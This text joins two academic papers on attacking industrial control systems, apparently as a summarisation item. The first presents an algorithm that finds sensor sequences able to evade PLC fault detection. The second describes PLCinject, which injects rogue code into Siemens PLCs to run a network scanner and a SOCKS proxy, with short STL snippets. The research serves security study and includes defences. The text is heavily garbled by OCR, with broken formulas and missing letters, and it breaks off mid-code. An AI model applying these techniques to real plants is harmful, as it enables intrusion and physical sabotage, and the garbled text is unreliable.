Before we start, we intro-duce the following de nition. De nition 1: The set of the observed I/O sequence of the collected data with rinputs and soutputs is denoted as =( 1,..., p) (1) where i=(ui(1),ui(2),...,ui(|ui|)),ui(j)is the j-th output in the i-th of I/O vector u,andu= (I1,...,Ir,O1,...,Os)=(IO1,...IOm)withm=r+s. We assume that for two successive I/O vectors u(t)/negationslash= u(t+1) holds to make sure that an I/O vector is supposed to be a new one if and only if at least one I/O vector changed. De nition 2: The observed language set and behavior of collected data: the observed language of length qas set of observed I/O vectors sequences of length q. Lq Obs=/uniondisplay i /parenleftBig| i| q+1/uniondisplay t=1(ui(t),ui(t+1),...,ui(t+q 1))/parenrightBig With the observed language set, the observed behaviors of lengthnare de ned as: BHEn Obs=n/uniondisplay i=1Li Obs (2) 3.2 Model identi cation 3.2.1 Model class The aim of identi cation is to make sure that the iden- ti edm-behaviors BEHm Ident is equal to the observed m- behaviors BEHm Obs wheremcan be any available value. Brie y, the identi ed model will reproduce the language ofthe PLC-based control system. The considered system is thecoupled system of well-programmed controller and physi- cal plant which is regarded as non-deterministic. Hence, we present the Non-Deterministic Autonomous Automaton withOutput (NDAAO) [10] that is suited to model our system. 10091Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. De nition 3: A non-deterministic autonomous automa- tion with output (NDAAO) is a ve-tuple NDAAO =(X, ,fnd, ,x0) with X=x0,...,x|x| 1is the nite set of states. = 1,..., | |is the nite set of output symbols. fnd:X 2Xis the non-deterministic transition func- tion. :X is the output function associating each state with an output symbol. x0is the initial state. The NDAAO can be represented by a digraph G= (V,E). The vertex set of Gis the set of all states in the NDAAO: V(G)=X The edge set of Gis represented by the transition function fnd: E(G)=/braceleftbig (xi,xj) X X:xj fnd(xi)/bracerightbig With each node associating with output (xi)of the corre- sponding state xi, Fig. 4 shows an simple example which helps to represent graphical NDAAO. Figure 4: Graphical representation of a NDAAO De nition 4: Word set and behavior of the NDAAO: the set ofn-length words generated by NDAAO starting in xiis Wn xi= w n|w=/parenleftbig (x(1),..., (x(n)))/parenrightbig : [ /parenleftbig x(1),...,x(n)/parenrightbig :x(1) =xi X, and 1 t n 1,x(t+1) fnd(x(t))] (3) Then the set of words of length ngenerated by NDAAO is Wn(NDAAO )=/uniondisplay xi XWn xi(4) With the description of word set, we can obtain the identi ed n-behavior of NDAAO, that is BEHn Ident=n/uniondisplay p=1Wp(NDAAO ) (5) De nition 5: An identi ed event vector (j)is the vari- ation between two adjacent identi ed output vector (j) and (j+1 ) of the NDAAO; it is formulated as = (j+1 ) (j). An input event vector I( (j))is the two adjacent input of identi ed output vector I(j),I(j+1) and a output event vector O( (j))has the similar de nition. The speci c formulation is showed as: (j)=m/uniondisplay l=1 Il1or Ol1,i fIl(j+1) Il(j)=1 Il0or Ol0,i fIl(j+1) Il(j)= 1 /epsilon1, if I l(j+1) Il(j)=0 (6)Considering the I/O vector sequence involving two in- puts and one output, we have =(A,B,C)=( 0 10 , 1 10 , 1 01 ) This sequence can be represented as : A I11 BI20,O11 C =AI11,I20,O11 C 3.2.2 Identi cation algorithm We present an identi cation algorithm generating the NDAAO that showed in the previous section. We de ne anidenti cation parameter kthat determines the length of I/O vector sequences which are used to create new states. Theidea of parameter kservers to produce the k-behaviors of NDAAO that is exactly equal to the n-behaviors generated from observed vector. The produced NDAAO is called n- complete. The construction of the NDAAO is mainly divided into three steps. Firstly, we transform the observed sequence to aset of sequence of words of length kand create a set of k 1 dummy states at the beginning to be consistent with the otherwords. The part 1 of Algorithm 1 shows transformation ofthe observed sequence. Secondly, we perform the NDAAOidenti cation. The states of the NDAAO are associated withwords of length kand the transition function is represented by words of length k+1. The part 2 of Algorithm 1 shows identi cation of the NDAAO. Finally, we merge the equiv-alent states to reduce the state space. For any two states x i andxjare different, if they are associate with the same out- put and if they have the same set of successors, then we canmerge such two states to the one state. We make visual-ization of the model by drawing the graphical dot from thestates and transition function of NDAAO. Speci c algorithmis shows in part 3 of Algorithm 1. Example 1. Consider three sequences have been collected from fault-free system: 1=(A,B,C,D,E,A ), 2= (A,B,D,C,D,E,A ), 3=(A,D,B,C,D,F,E,A ). The capital letters represent different I/O vectors. Here wechoose identi cation parameter k=2 . After the transfor- mation of the sequences, we can obtain k=2 1=(AA,AB,BC,CD,DE,EA ) k=2 2=(AA,AB,BD,DC,CD,DE,EA ) k=2 3=(AA,AD,DB,BC,CD,DF,FE,EA ) and k=3 1=(AAA,AAB,ABC,BCD,CDE,DEA ) k=3 2=(AAA,AAB,ABD,BDC,DCD,CDE,DEA ) k=3 3=(AAA,AAD,ADB,DBC,BCD,CDF, DFE,FEA ) After getting k=2and k=3, we obtain the states from k=2and transition function from k=3according to the part 2 of Algorithm 1. The corresponding graph is shown inthe Fig. 5. 10092Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Algorithm 1 Construction of the NDAAO Input: observed I/O sequence and identi cation parameter k Output: the NDAAO and digraph G=(V,E); //Part1: transformation of the observed sequence 1:foreach i do 2: ifui(1)/negationslash=ui(| i|)then 3: Remove ifrom ; 4: Return; 5: else 6: i(t)=/braceleftBigg ui(1),f o r1 t k 1 ui(t k+1),f o r k t k+| i| 1 7: form=1to| i|do 8: wi(m)=( i(m),..., i(m+k 1); 9: end for 10: k i=(wi(1),...,w i(| i|); 11: end if 12: end for 13: k=| |/uniontext i=1 k i; //Part2: identi cation of the NDAAO 14:Initialize the states X= , transition function fnd(x0)= , output = , initial state x0= k[0][0] , nodesN= and edgesE= ; 15: for all such that kdo 16: for all such that do 17: X X ; 18: (| |); 19: end for 20: end for 21: for all such that k+1do 22: for all such that do 23: x [1 k]; 24: fnd(x)= [k | |]; 25: end for 26: end for //Part3: reduction of the state space and graphical representa- tion 27: for allxi,xjsuch that xi,xj Xandi/negationslash=jdo 28: if (xi)= (xj)andfnd(xi)=fnd(xj)then 29: mergexiandxj, deletexi(xj)fromXand replace fnd(x)=xi(xj)withfnd(xpre)=xj(xi), herexpreis the predecessor of xi(xj); 30: end if 31: end for 32:V V X; 33:E E (x,fnd(x)); 34:Graw(G(V ,E)); Figure 5: Identi ed NDAAO after the second step of the identi cation algorithm The primary identi ed model has redundant states and edges than those of the original model, hence reduce the statespace according to the part 3 of Algorithm 1 to simplify pri-mary model. For example, if we merge the state DB withthe stateAB, stateBA with the state EA and the state BC with the state DC, and replace the k-length word with x ifor xi X. we will get the simpli ed NDAAO in the Fig. 6. Figure 6: Finally identi ed NDAAO after merging equiva- lent states 3.3 Construction of False Sequence Attack After we identify the NDAAO which is fault-free, we can take advantage the principle of fault detection to constructundetectable false sequences. As we all know, fault detec-tion is to determine whether every current observed I/O vec-tor according with the output of the identi ed NDAAO. If theresult is true, it is considered that the current vector is legal,otherwise, false alert. In our approach of attack, we con-struct the false sequence attack, which is not only satisfyingthe same output from the identi ed model that ensure the at-tack cannot be detected, but also causing the malicious sys-tem behavior through choosing appropriate length of falsesequences with false actuating logic. The speci c formal de-scription of the false sequence of length nstarting with x iis de ned as follows, Sn xi= s n|s=/parenleftbig (x(1),..., (x(n)))/parenrightbig (s/ Ln Obs):[ /parenleftbig x(1),...,x(n)/parenrightbig :x(1) =xi X, and 1 t n 1, x(t+1) fnd(x(t))] (7) The above de nition Sn xiconstructs the sequences of lengthnthat are intercepted from the identi ed NDAAO and different from any sequence of observed I/O vectors. There-fore, the de ned false sequence attack can be the potentialharmful intrusion when injected into compromised sensors.Since the reduced NDAAO is (k+1) -complete, the follow- ing equation is set up. m k+1,BEH m Obs=BEHm Ident (8) According to the above theory, only the sequences whose lengths are not less than k 2inSn xican be the false se- quences. We obtain all sets of false sequences generatedfrom NDAAO based on identi cation parameter kis A k=/uniondisplay xi X/parenleftbigmax(| d|)/uniondisplay n=k+2(Sn xi)/parenrightbig , d (9) Since we propose the de nition of false sequence, the next step is to present search algorithm to obtain all the sets ofundetectable false sequences. Algorithm 2 shows that usingrecursion formula of IncSearching can gradually get the false sequences whose length is not less than k+2and those sequences that selected from the NDAAO and disparate from 10093Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. any subsequence of observed I/O vectors start with state xinit. With the output of the IncSearching we acquire all sets of the sequences Akthrough merging all Sxinitwith all start state xinitcoming from states Xof the NDAAO as fol- low, Ak=/uniondisplay xinit X/parenleftbig Sxinit/parenrightbig (10) Algorithm 2 IncSearching Input: the identi ed NDAAO, observed I/O sequence , identi - cation parameter kand initial state xinit Output: the sets of false sequences Sxinit; 1:foreachx xinit do 2:xinit=fnd(x) 3:seq.append(x) 4:IncSearching (NDAAO, ,k,x init) 5: if|seq| (k+2 ) andseq / substring ( )for then 6:Sxinit.append(seq) 7: end if 8:seq.pop() 9:end for 10:ReturnSxinit By Algorithm 2, the obtained sets of un- detectable false sequences of Example 1 are(A,D,B,D,... ),(...,D,C,D,F,... ),(A,B,C,D,F,... ), where the apostrophes before or after the letter can be anypredecessors or successors of the letter. Because attackers might have limited control over limited compromised sensors coming from control system, we re-quire to determine controller I/Os which have changed be-tween two consecutive vectors of false sequences generatedfrom above method. 3.4 Feasibility and Performance Evaluation There are two main reason to support the feasibility of my work. Firstly, with the identi cation parameter kincreas- ing, the states of NDAAO increase rapidly and can be harderto converges to a stable level according to the system evo- lutions in chronological order [10]. Hence, it is dif cult to handle the huge calculation when proceeding on line detec-tion under the condition of the large value k. We mostly implement off-line attack and have enough time to carry outcalculation. Secondly, due to the stability and performanceof detect mechanism, in actual industrial system generally asmall parameter kis enough to meet practical requirements based on fault detection [8]. To evaluate the connectivity of the NDAAO, we will give information about the mean number of edges originatingfrom a state. We de ne the structure complexity metric C s as: Cs=/summationtext xi X(deg(xi)) |X|(11) heredeg(xi)=|fnd(xi)|is the degree of a state. Similar to the complexity metric, we de ne the attack vulnerability index to measure the success rate of the falsesequence searched from the identi ed NDAAO. The attackvulnerability index is shown as: C n A=|/uniontext xi X(An xi)| |Wn Ident|(12)By equation (11) and (12), we can obtain the ratio of the multiple branch state from all states and ratio of the falsesequence from all identi ed I/O sequences. 4 Case Study To demonstrate the feasibility and performance of the pro- posed method for false sequence attack, a case study is pre-sented. The considered system is a small sorting system ofgoods and the function of this system is to sort parcels ac-cording to their size. The system has 11 inputs (measure-ments from the system) and 5 outputs (signals from PLC tothe actuators). Fig. 7 shows the layout of the sorting systemof goods. Figure 7: Sorting system of goods Figure 8: Part of NDAAO The identi cation database is composed of 50 ob- served cycles of operation and every cycle is col-lected at the right time of the arrival of a parceland its sorting. The vector entries are all formed as[A+,A ,B,C,D,k 1,k2,a0,a1,a2,b0,b1,c0,c1,d0,d1]. After the identi cation process and reduction of the states,the part of NDAAO model with the identi cation parameter k=2 is shown in g. 8. By the obtained model, we implement false sequence searching process and before simpli cation we havesearched plenty of different length of false sequences thatcan be potentially as the malicious logic orders of data in- 10094Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 9: Amount of false sequences changes with length Figure 10: Relation between CsandCn A jected into compromised sensors. Such as A1=Q34Q21Q22Q30 A2=Q32Q10Q11Q12Q28 A3=Q16Q17Q18Q19Q20Q34 whereQiis the output of each vector of the observed cycles. However, the above sequences require all the compro- mised sensors if adversaries carry out attacks. So we needto simplify the searched sequences using event vector fromthe equation (6) and processed above sequences list as fol-lows, A 1=Q34d11,b01,{b00,d01} Q30 A2=Q32d11,b11,k21,{b10,d01} Q28 A3=Q16{k10,a00,c11d10},a11,a10,k21,{a21,c10} Q34 Here symbol sequences of each arrow divided by comma are sets of single event input between every two vectors of thefalse sequences. When we implemented the process of sort- ing goods with injecting these false sequences, the sortingprocess obtained the wrong sort results without being de- tected by fault detection. From the obtained false sequences, we nd that most of the false sequences are concentrate on the lengths between19 and 26. So the potentially malicious attack can select from false sequences of such lengths. Fig. 9 shows theamount of false sequence changes with length under differ-entk. Considering the feasibility of the attack and the larger state s degree the more multiple branch state, Fig. 10 showsthat with the structure complexity metric C s(ratio of the multiple branch state) decreasing, the attack vulnerability in-dex (ratio of the false sequence) drops quickly. Hence, wecan detect such attack through add the detection on multiplebranch states without deliberately increasing identi cationparameter k. 5 Conclusion In this paper, we have presented false sequence attack as one way to nd the undetectable false sequence attackagainst control system from I/O traces of compromisedPLCs. The obtained false sequence attack will be used asmalicious logic attack injected into remote sensors moni-tored by PLCs to damage the control system. We have given a whole implementation of the construction of false sequence attack including the search algorithm of false se-quence. The detection on multiple branch states will becomean effective defense against such attacks. Simulation showsthat our method is a practical threat against the control sys-tem with fault detection, which illustrate the effectiveness ofour proposed method.
Summary:
It is essential to ensure accurate sensor measurements to safely regulate physical process in power control system. Traditional false data injection (FDI) attacks against control system mainly require the attackers to obtain the optimal maliciousinputs. Different from the traditional FDI attacks, we present false sequence attack that can disable the fault detection againstProgrammable Logic Controllers (PLCs) with partial information about the victim system. Our attack formulation is to identify adiscrete event model of collected fault-free I/O traces from compromised PLCs, and nd the undetectable false sequences that areselected as desired attacks injected into compromised sensors from the identi ed model. A representation industrial simulationshows that we construct the false sequence attack against the control system with fault detection. Key Words: power control system, false sequence attack,false data injection, discrete event model, fault detection
|
Summarize:
I. INTRO DUCT ION Industrial control systems (ICS) are integral components of production and control tasks. Modern infrastructure heavily relies on them. The introduction of the Smart Manufacturing (Industry 4.0) technology stack further increases the dependency on industrial control systems [1]. Modern infrastructure is already under attack and offers a broad attack surface, ranging from simple XSS vulnerabilities [2], [3] to major design flaws in protocols [4], [5]. The canonical example of an attack on an industrial control system is the infamous Stuxnet worm that targeted an Iranian uranium enrichment facility. However, adversaries increasingly target ordinary production systems [6]. A recent example is the forced shutdown of a blast furnace in a German steelworks in 2014. The attackers reportedly gained access to the pertinent control systems via the steelwork's business network [7]. This is a typical attack vector because business networks serve humans and humans are susceptible to spear phishing. Arguably , spear phishing is easy to carry out when ac companied with research and social engineering. However, in far too many cases, even easier ways exist into industrial control systems. Published scan data shows that thousands of ICS components, for example, programmable logic controllers (PLCs), are directly reachable from the Internet [8], [9], [10]. While only one PLC of a production facility may be reachable in this fashion, the PLC may connect to internal networks with many more PLCs. This is what we call the "deep" industrial network. In this paper, we investigate how adversaries can leverage exposed PLCs to extend their access from the Internet to the deep industrial network. 978-1-4673-7876-5/15/$31.00 2015 IEEE 524 The approach we take is to turn PLCs into gateways (we focus on Siemens PLCs). This is enabled by a notorious lack of proper means of authentication in PLCs. A knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode, which is the native form of PLC code. We explored the runtime environment of PLCs and found that it is possible to implement several network services using uploaded MC7 code. In particular, we implemented a SNMP scanner for Siemens PLCs, and a fully fledged SOCKS proxy for Siemens PLCs entirely in Statement List (STL), which compiles to MC7 byte code. Our scanner and proxy can be deployed on a PLC without service interruption to the original PLC program, which makes it unlikely that unsuspecting operators will notice the infection. In order to demonstrate and analyze deep industrial network intrusion, we developed a proof of concept tool called PLCinject. Based on our proof of concept, we analyzed whether the augmentation of the original code with our PLC mal ware led to measurable effects that might help detecting such augmentations. We looked at timing effects, specifically. We found that augmented code is distinguishable from unaugmented code, that is, statistically significant timing differences exist. The difference is minor in absolute terms, that is, the augmentation does not likely affect a production process and hence it will not be noticable unless network operators actively monitor for malicious access. The downside is that operators of industrial networks must include PLCs in their vulnerability assessment procedures and they must actively monitor internal networks for malicious network traffic that originates from their own PLCs. Moreover, adversaries can leverage our approach to attack a company's business network from the industrial network. This means that network administrators must guard their business networks from the front and the back. The remainder of this paper is organized as follows. We begin with a discussion of work related to ours in II. In III, we give technical background for readers unfamiliar wth industrial control systems. We describe our attack and intrusion methods in IV. In VI, we discuss mitigations and VII concludes the paper. II. RE LA TED WORK Various attacks on PLCs have been published. Most attacks target the operating systems of PLCs. In contrast we leverage the abilities of logic programs running on the PLCs. As such we do not use any unintended functionality. In the following, we compare our approach to well-known (code) releases and published attacks that manipulate logic code. One of the most Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) MES SCADA PLC In-IOutputsignals Manufacturing process Figure 1: Automation pyramid, adopted from [15] cited SCADA attack descriptions is Beresfords' 2011 Black Hat USA release [5]. He demonstrated how credentials can be extracted from remote memory dumps. In addition he shows how to start and stop PLCs through replay attacks. In contrast to our work he does not alter the logic program on the PLC. In 2011 Langner released "A timebomb with fourteen bytes" [11] wherein he describes how to inject rogue logic code into PLCs. He borrows the same code prepending technology as we do, from Stuxnet. He conceptualizes how to take control away from the original code. In contrast, our program runs in parallel to the original code with the goal to not interfere with the original code's execution. An attack similar to Langners' was presented at Black Hat USA 2013 by Meixell and Forner [12]. In their release they describe different ways of exploiting PLCs. Among those are ways to remove safety checks from logic code. Again, our approach differs as we add new functionality while preserving original functionality . To our best knowledge, the first academic paper on PLC mal ware was published by McLaughlin in 2011 [13]. In this work he proposes a basic mechanism for dynamic payload generation. He presents an approach based on symbolic execution that recovers boolean logic from PLC logic code. From this, he tries to determine unsafe states for the PLC and generates code to trigger one of these states. In 2012 McLaughlin published a followup paper [14], which extends his approach in a way that automatically maps the code to a predefined model by means of model checking. With his model, he can specify a desired behaviour and automatically generate attack code. In his work McLaughlin focuses on manipulating the control flow of a PLC. We, in contrast, use the PLC as a gateway to the network and leave its original functions untouched. III. IND USTRIAL CO NTROL SY STEM S Figure 1 illustrates the structure of a typical company that uses automation systems. Industrial control systems consist of several layers. At the top are enterprise resource planning (ERP) systems, which hold the data about currently available resources and production capacities. Manufacturing execution systems (MES) are able to manage multiple factories or plants and receives tasks from ERP systems. The systems below the MES are located in the factory. Supervision, control and data acquisition (SCADA) systems control production lines. They 525 Process ima ge of outputs (PIO) Time slices (1 ms each) Process ima ge of inpu ts m (PII) o m @) () User program Cycle control poin t (CCP) Operatin g syste m (OS) Figure 2: Overview of program execution, extracted from [17] provide data about the current production state and they provide means for intervention. The devices holding the logic for production processes are called programmable logic controllers (PLC). We explain them in more detail in section III-A. Human machine interfaces (HMI) display the current progress and allow operators to interact with the production process. A. PLC Hardware A PLC consists of a central processing unit (CPU) which is attached to a number of digital and analog inputs and outputs. A PLC program stored on the integrated memory or on a external Multi Media Card (MMC) defines how the inputs and outputs are controlled. A special feature of a PLC is the guaranty of a defined executions time to control time critical processes. For communication or special purpose applications the functionality of a CPU can be extended with modules. The Siemens S7- 314C-2 PNIDP we use in our experiments has 24 digital inputs, 16 digital outputs, 5 analog inputs, 2 analog outputs and a MMC slot. It is equipped with 192 KByte of internal memory, 64 KByte can be used for permanent storage. Additionally, the PLC has one RS485 and two RJ45 sockets [16]. B. PLC Execution Environment Siemens PLCs run a real time operating system (OS), which initiates the cycle time monitoring. Afterwards the OS cycles through four steps (see figure 2). In the first step the CPU copies the values of the process image of outputs to the output modules. In the second step the CPU reads the status of the input modules and updates the process image of input values. In the third step the user program is executed in time slices with a duration of 1 ms. Each time slice is divided into three parts, which are executed sequentially: The operating system, the user program and the communication. The number of time slices depends on the current user program. By default the time should be not longer than 150 ms. An engineer can configure a different value. If the defined time expires, an interrupt routine is called. In the common case the CPU returns to the start of the cycle and restarts the cycle time monitoring [17]. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) C. Software Siemens provides their Total Integrated Automation (TIA) portal software to engineers for the purpose of developing PLC programs. It consists of two main components. The STEP7 as development environment for PLCs and WinCC to configure HMls. Engineers are able to program PLC in Ladder Diagram (LAD), Function Block Diagram (FBD), structured control language (SCL) and Statement List (STL). In contrast to the text-based SCL and assembler-like STL the LAD and FBD languages are graphical. PLC programs are divided into units of organization blocks (OB), functions (FC), function blocks (FB), data blocks (DB), system functions (SFC), system function blocks (SFB) and system data blocks (SDB). OBs, FCs and FBs contain the actual code while DBs provide storage for data structures and SDBs current PLC configurations. For internal data storage addressing the prefix M for memory is used. D. PLC Programs A PLC program consists of at least one organization block called OBI , which is comparable to the main function in a traditional C program. It will be called by the operating system. There exist more organization blocks for special purposes, for example, OB 100. This block is called once when the PLC starts and is used usually for the initialization of the system. Engineers can encapsulate code by using functions and function blocks. The only difference is an additional DB as a parameter to calling a FE. The SFCs and SFBs are built into the PLC. The code can not be inspected. The STEP7 software knows which SFCs and SFBs are available based on hardware configuration steps. The following examples give an overview of the the programming languages SCL, LAD and STL. Each example shows the same configuration of three inputs and one output. First, the CPU performs a logical AND operation of inputs o . 0 and O. 1. Next, it calculates a logical OR operation of the outcome and the input 0 . 2. The result is written to output o 0 which sets the logical values to the connected wire in the next cycle. The first example represents the described program in STL. This is done in four lines of assembler-like instructions. Each line defines one instruction. A %10.0 2 A %10 .1 3 0 %10 .2 = o/cQO.O The next example shows the same program in the text-based language SCL. This program can be expressed in one line. I, o/cQO.O := (% 1 0.0 AND %10 .1) OR %10 .2; The graphical example needs the help of the STEP7. Inputs and outputs are positioned through drag & drop on the wire. New connections can be made on predefined positions by selecting the wire-tool from the toolbar above. Figure 3 shows the graphical representation of our example program. The following description can also be found in the Siemens manual delivered with the PLC [18]. The CPU has several registers used for execution and current state. For binary 526 Figure 3: Function block diagram example operations the status word register is important. All binary operations influence this register. The CPU uses for calculations up to four accumulator registers of 32 bits width. They are organized like a stack. It is possible to address independently each byte of the top register. Before a new value is loaded into the accumulator one the current value is copied to accumulator two. For adding two numbers the values have to be loaded successively into the accumulator register before the +0 operation is called. The result is written back into accumulator one. In STL the program would look like as following. L 2 L +D DW#16 #1 / / ACCU1 =l DW# 16#2 II ACCU1 =2,ACCU2 =1 / / ACCU1=ACCU1 +ACCU2 Code which is used multiple times in the program should be implemented as functions. These functions can be called from every point in the code. The CALL instruction allows to jump into the defined function. The necessary parameters are defined in the called function header and have to be specified below every CALL instruction. CALL FC1 VARI '- 1 VAR2 '-W#16 #A As mentioned earlier the only difference between function blocks and functions is a reference to the corresponding data block. In many cases the program needs storage which is assigned to a specific function to read constants or save process values. It is unusual to put constants direct in the code, because the code have to be recompiled after every change. In contrast data blocks can be manipulated easily even remotely. A function block call looks like as following. , CALL FB 1, o/cDB 1 VARI '- 1 VAR2 := W#16 #A Both function types can define different parameters: IN, OUT, IN_OUT, TEMP and RET_VAL. The FB STAT parameters are stored in its data block, which is passed as an additional argument. The TEMP type declares local variables which only are available in the function. The other types are self explanatory. E. Binary Representation of PLC Program Every code written in any language is compiled into MC7. The opcode length of MC7 instructions is variable and the encoding of parameters differs on many instructions. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) binary representation of the example program from the section before looks as following. 00100000 00110000 0112 0000 41100000 F Network Protocol A A o %IO .0 %10.1 %IO .2 o/t.QO.O The Siemens PLCs uses the proprietary S7Comm protocol for transferring blocks. It is a remote procedure call (RPC) protocol based on TCP/IP and ISO over TCP. Figure 4 illustrates the encapsulation of the protocols. The protocol provides the following functionality: System State List (SSL) request List available blocks Read/write data Block info request Up-/download block Transfer block into filesystem Start, stop and memory reset Debugging The executing of one of these function requires an initialized connection. After a regular TCP handshake the ISO over TCP setup is proceeded to negotiate the PDU size. In the S7Comm protocol the client has to provide additionally to his preferred PDU size the rack and slot of the CPU (see connection setup in figure 5). The CPU responses with its preferred PDU size and both agree to continue with the minimum of both values. After this initialization the client is able to invoke the functions on the CPU. Figure 5 shows the packet order of a download block function including the transfer into the filesystem. The PLC controls the download process after receiving the download request. The number of download block requests depends on the length of the block and the PDU size. The end is signaled with the download end request. The PLC waits after receiving the acknowledgement for further requests. Finally the transferred block should be persisted by calling the pIc control request. With the destination filesystem P as parameter the CPU stores the block and executes it. The upload process is similar. The engineering work station (EWS) requests for the upload of a specific block and waits for the acknowledgement. After receiving the acknowledgement without errors the EW S starts requesting the block. The responses contain the data of the block. The EWS repeats the procedure as long as the whole block is transferred. The end is signaled with an upload end request. The transferred blocks are structured and consists of header, data part and footer. The table I shows the structure of the known bytes. The footer contains information about the parameters used for calling the function. Not every byte of the header and footer are known well, but we have identified the necessary areas to understand the content. IV. AT TAC K DESCRIPT ION The search engine SHODAN shows that thousands of industrial control systems are direct accessible via the In ternet [8], [10]. As shown in chapter III it is possible to 527 Table I: Block structure, adopted from code [20] Description Bytes Offset Block signature 2 0 Block version I 2 Block attri bute 3 Block language 4 Block type I 5 Block number 2 6 Block length 4 8 Block password 4 12 Block last modified date 6 16 Block interface last modified date 6 22 Block interface length 2 28 Block Segment table length 2 30 Block local data length 2 32 Block data length 2 34 Data (Me7 / DB) x 36 Block signature I 36+x Block number 2 37+x Block interface length 2 39+x Block interface blocks count 2 41+x Block interface y 43+x download and upload the PLC program code. This enables attacker to manipulate the logic code of the PLCs that reads inputs and outputs. Furthermore the PLC offers a system library [21] which contains functions to establish arbitrary TCP/UDP communication. An attacker can use the full TCP/U DP support to scan the local production network behind the internet-facing PLC Furthermore he can leverage this PLC as a gateway to reach all the other production or network devices. Like Stuxnet we prepend the attacker's code to the existing logic code of the PLC The malicious code will be executed at the very beginning of OB I in addition to the normal control code. That is why the PLC will not be disturbed in its function. The easiest way is to download the OB I of Siemens PLCs and add a CALL instruction to an arbitrary function under our control, in our example a function called FC666. Then the patched OBI, FC666 and additional blocks will be uploaded to the PLC Figure 7 illustrates the code injection process. With the next execution cycle of the PLC the new uploaded program including the attacker's code will be executed without any kind of service disruption. This process enables the attacker to run any additional malicious code on the PLC With this paper we publish a tool called PLCinject that will automate this process [22]. Having this capabilities an attacker is able to execute the attack cycle as shown in figure 6. In step one the attacker injects a SNMP Scanner that runs in addition to the normal control code of the PLC After a full SNMP scan of the local network (step two) the attacker can download the scan results from the PLC (step three). The attacker has now an overview of the network behind the Internet-facing PLC The attacker removes the SNMP scanner and injects a SOCKS Proxy to the PLC logic program (step four). This enables the attacker to reach all PLCs in the local production network via the compromised PLC which acts as a SOCKS proxy. In the next two sections we are going to explain the implementation of the SNMP scanner and the SOCK S proxy . We will not explain every operation and system function in detail. For a complete description of those we refer to [18] and [21]. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) S7 Telegram Header I Params I Pardata I Data ISO over TCP TPKT I COTP S7 PDU TCPIIP I Header ISO TCP Telegram Figure 4: Packet encapsulation, adopted from [19] I EWS I I PLC I Connection Setup, PDU-Size:512 -- Connection Setup, PDU-Size:240 Download Request --- Download Request Ack -Downl oad Block Downlo ad Block Ack, (Data) --- Downl oad End Download End Ack PLC Control insert block into filesystem p --- -- PLC Control Ack Figure 5: Download block sequence diagram A, SNMP Scanner Siemens PLCs can not be used as a TCP port scanner because the used TCP connection function TCON cannot be aborted until the function has established an connection, Furthermore it is only possible to run eight TCP connection in parallel on a Siemens S7-300 PLC, Consequently the PLC is only able to perform a TCP scan until eight unsuccessful connection attempts occurred. This limitation do not apply to stateless UDP connections. That is why we use the UDP based Simple Network Management Protocol (SNMP). SNMP version 1 is defined in RFC 1157 [23] and was developed for monitoring and controlling network devices. A lot of network devices and most of the Siemens Simatic PLCs have SNMP enabled by default. Siemens PLCs are very communicative in case of enabled SNMP. By reading the SNMP sysDesc object with the 010 1.3.6.1.2.1.1.1, the Siemens PLC will transmit its product type, product model number, hardware and firmware version as shown in the following SNMP response: 528 Siemens, SlMATlC S7, CPU314C-2 PN/OP, 6ES7 314-6EH 04-0A BO , HW: 4, FW: V3.3.1 0. The system description is very useful for matching discovered PLCs against vulnerability and exploit databases. The firmware of PLCs is not very often patched. There are mainly two reasons: On the one hand a PLC firmware patch will interrupt the production process which causes a negative monetary impact. On the other hand a firmware patch of the PLC can lead to a loss of the production certification or other kind of quality assurance that is important for the customers of the manufacturing company. That is why the probability to find a Siemens PLC with a known vulnerability is very high. The SNMP scanner can be broken down into the following steps: 1) Get local IP and subnet 2) Calculate IPs of the subnet 3) Set up UDP connection 4) Send SNMP request 5) Receive SNMP responses 6) Save responses in a DB 7) Stop scanning and disconnect UDP connection As described in the chapter III the programming of a PLC is quite different from normal programming with e.g. the C language on a x86 system. Each PLC program is cyclically executed. That is it is needed save the state of the program after each step with condition variables. For reasons of comprehensibility we will only explain steps one to three. Figure 8 shows a code snippet of step one that calls the ROSYSST function. The ROSYSST function reads the internal System State List (SSL) of the Siemens PLC to obtain the PLC's local IP. SSL requests are normally used for diagnostic purposes. Line 14 and 15 will end the function in the case that the ROSYST function is busy. Figure 9 shows how the program calculates the first local IP. This is done by bitwise logic AND operation of the PLC's local IP address with its subnet mask, which returns the start address of the local network address range (line 24 -30). Now the SNMP scanner needs to know how often it must increment the IP address to cover the whole local subnet. Therefore we XOR the subnet mask with OxFFFFFFFF (line 35 -39). The result is the number of IP addresses in the subnet. Figure 10 shows how to set up an UDP connection in STL. At first we need to call the TCON function with special parameters in our TCON_P AR_SCAN data block. In case of UDP the TCON function does not set up a connection, this will only be done in the case of TCP because it is connection oriented in contrast to UDP. But calling the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 1O.0.0.3 .. -, ,- ".l \ ___ , , " ,\ )1 I Corporate I production "l " network , r", ', J _ ... 1O.0.0.3 (a) Attacker abuses the PLC to scan the local network for SNMP (b) Now he can use the PLC as a gateway into the local network devices Figure 6: Attack cycle OB 1 L1: II A AN A JNB CALL NOP ... 90Q124.0 